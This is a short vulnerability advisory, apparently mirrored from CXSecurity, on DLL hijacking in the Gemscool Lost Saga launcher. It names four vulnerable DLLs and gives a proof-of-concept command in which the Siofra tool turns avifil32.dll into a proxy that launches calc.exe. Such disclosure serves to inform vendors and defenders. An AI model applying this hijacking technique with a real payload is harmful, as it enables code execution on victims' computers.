Gemscool Lost Saga DLL Hijacking - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1601123 漏洞类型
发布时间 2019-05-09 更新时间 2019-05-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050098
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
In the Lost Saga launcher game there is a bug in the DLL file, There are several vulnerable DLL files, namely:

1. avifil32.dll
2. WINMM.dll
3. MSACM32.dll
4. MSVFW32.dll

I copied the DLL avifil32.dll file in the C:\Windows\SysWOW64 folder to the Lost Saga game folder, then I copied the file again, renamed it to avifil32_original.dll, so there are 2 DLL files.

Exploit :

C:\siofra\Siofra32.exe --mode infect -f avifil32_original.dll -o avifil32.dll --payload-type process --payload-path C:\Windows\System32\calc.exe

Demo :

https://drive.google.com/file/d/1gzeZ8MU4rbHVdYiM0pWOe0rdV1wrJb6P/view?usp=sharing

Vendor Link :

https://lostsaga.gemscool.com/